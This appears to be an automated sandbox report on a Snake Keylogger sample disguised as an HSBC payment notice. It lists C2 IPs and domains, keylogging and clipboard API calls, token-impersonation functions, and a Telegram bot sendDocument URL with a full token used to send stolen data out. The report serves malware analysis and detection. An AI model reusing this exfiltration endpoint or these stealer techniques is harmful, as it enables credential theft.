Source: armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/(
Source: armsvc.exe, 00000003.00000003.2004431496.000000000076D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/lvpmgtiw
Source: armsvc.exe, 00000003.00000003.1774989886.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/reorqerswtf
Source: armsvc.exe, 00000003.00000003.1774989886.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/reorqerswtft
Source: armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/w
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 0000000C.00000002.2611502749.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://knjghuig.biz/
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000A48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/L
Source: RegSvcs.exe, 0000000C.00000002.2611502749.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/
Source: armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzVjNDkwMmIx
Source: armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005$G
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005~X
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww99.przvgke.biz/
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww99.przvgke.biz/TY
Source: armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1513750361.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww99.przvgke.biz/aikqer
Source: armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1513750361.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774140631.000000000074D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536824828.000000000074D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww99.przvgke.biz/gtsohqagtapqeyt
Source: armsvc.exe, 00000003.00000003.1709255215.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
Source: setup.exe1.3.dr	String found in binary or memory: https://clients2.google.com/cr/report
Source: armsvc.exe, 00000003.00000003.1768237760.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: armsvc.exe, 00000003.00000003.1769451388.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1769192381.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: armsvc.exe, 00000003.00000003.1480241091.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
Source: armsvc.exe, 00000003.00000003.1480241091.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
Source: armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pcnatrk.net/track.
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189.0
Source: setup.exe1.3.dr	String found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports
Source: setup.exe1.3.dr	String found in binary or memory: https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..
Source: armsvc.exe, 00000003.00000003.1513462824.0000000000764000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1505305672.0000000002270000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1505013934.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_00474164

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_00474164

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_00473F66

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_0046001C

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_0048CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00403B3A
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000000.1314277987.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_47dcb9c3-b
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000000.1314277987.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f8b2d006-5
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_88a290aa-1
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f3429e1a-d

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: initial sample	Static PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00998140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,

1_2_00998140

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

1_2_0046A1EF

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00458310

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_004651BD

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\a0358cca38a50504.bin			Jump to behavior
Source: C:\Windows\System32\wbengine.exe	File created: C:\Windows\Logs\WindowsBackup

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0040E6A0	1_2_0040E6A0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042D975	1_2_0042D975
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0040FCE0	1_2_0040FCE0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004221C5	1_2_004221C5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004362D2	1_2_004362D2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004803DA	1_2_004803DA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0043242E	1_2_0043242E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004225FA	1_2_004225FA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0045E616	1_2_0045E616
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004166E1	1_2_004166E1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0043878F	1_2_0043878F
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00436844	1_2_00436844
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00480857	1_2_00480857
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00418808	1_2_00418808
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00468889	1_2_00468889
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042CB21	1_2_0042CB21
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004EECC8	1_2_004EECC8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00436DB6	1_2_00436DB6
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00416F9E	1_2_00416F9E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00413030	1_2_00413030
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042F1D9	1_2_0042F1D9
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00423187	1_2_00423187
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00401287	1_2_00401287
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00421484	1_2_00421484
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00415520	1_2_00415520
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00427696	1_2_00427696
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00415760	1_2_00415760
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00421978	1_2_00421978
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00439AB5	1_2_00439AB5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00487DDB	1_2_00487DDB
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00421D90	1_2_00421D90
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0042BDA6	1_2_0042BDA6
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0040DF00	1_2_0040DF00
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00413FE0	1_2_00413FE0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140	1_2_00998140
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009962E0	1_2_009962E0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0099A350	1_2_0099A350
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0099B6DE	1_2_0099B6DE
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009CF080	1_2_009CF080
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009BE570	1_2_009BE570
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009D4766	1_2_009D4766
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009A0A10	1_2_009A0A10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009CCB10	1_2_009CCB10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009A0B70	1_2_009A0B70
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009CBD80	1_2_009CBD80
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009C2D10	1_2_009C2D10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00997E70	1_2_00997E70
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009C4F10	1_2_009C4F10
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009D2F33	1_2_009D2F33
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00C425B8	1_2_00C425B8
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00C3ED5C	1_2_00C3ED5C
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
